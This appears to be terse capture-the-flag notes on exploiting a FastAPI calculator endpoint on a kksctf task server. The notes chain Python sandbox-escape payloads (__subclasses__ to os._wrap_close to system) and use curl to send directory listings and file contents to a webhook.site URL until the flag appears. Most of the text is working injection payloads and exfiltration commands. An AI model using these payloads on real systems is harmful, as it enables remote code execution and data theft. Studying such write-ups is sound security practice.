Robots.txt
	ser-agent: HeaderLess-Robots
	Disallow: /flag.txt
	Disallow: /flag

Response Header
	x-powered-by: FastAPI => python 3.6+

http://tasks.kksctf.ru:30080/docs
	POST /3l3ctriC_Sh33Ps_dR34m5_4b0ut_C4lc
	Parameter: calc_req, additional_text

calc_req=1+2+3
	6

May be eval behind

"".__class__
	<class 'str'>
"".__class__.__mro__[1].__subclasses__()[133]
	<class 'os._wrap_close'>

"".__class__.__mro__[1].__subclasses__()[133].__init__.__globals__["system"]("ls")
	0

"".__class__.__mro__[1].__subclasses__()[133].__init__.__globals__["system"]('curl -X POST https://webhook.site/c5c3b319-bf6d-4e41-a75c-b1c7ef87665e --data "$(ls -al)"')
	total 28
	drwxr-xr-x 1 root root 4096 Dec 13 08:42 .
	drwxr-xr-x 1 root root 4096 Nov 17 00:00 ..
	drwxr-xr-x 2 root root 4096 Dec 13 08:42 __pycache__
	-rw-rw-r-- 1 root root 1349 Dec 12 21:40 main.py
	-rw-rw-r-- 1 root root   83 Dec 12 21:00 requirements.txt
	drwxr-xr-x 2 root root 4096 Dec 12 21:41 t

"".__class__.__mro__[1].__subclasses__()[133].__init__.__globals__["system"]('curl -X POST https://webhook.site/c5c3b319-bf6d-4e41-a75c-b1c7ef87665e --data "$(ls -al t)"')
	total 20
	drwxr-xr-x 2 root root 4096 Dec 12 21:41 .
	drwxr-xr-x 1 root root 4096 Dec 13 08:42 ..
	-rw-rw-r-- 1 root root  767 Dec 12 21:00 base.jhtml
	-rw-rw-r-- 1 root root  119 Dec 12 21:00 calc_or_not_to_calc.jhtml
	-rw-rw-r-- 1 root root  160 Dec 12 21:00 index.jhtml

"".__class__.__mro__[1].__subclasses__()[133].__init__.__globals__["system"]('curl -X POST https://webhook.site/c5c3b319-bf6d-4e41-a75c-b1c7ef87665e --data "$(cat t/calc_or_not_to_calc.jhtml)"')
	kks{jinj4_inj3cti0ns_c4n_t4k3_y0u_t0_dr34m5}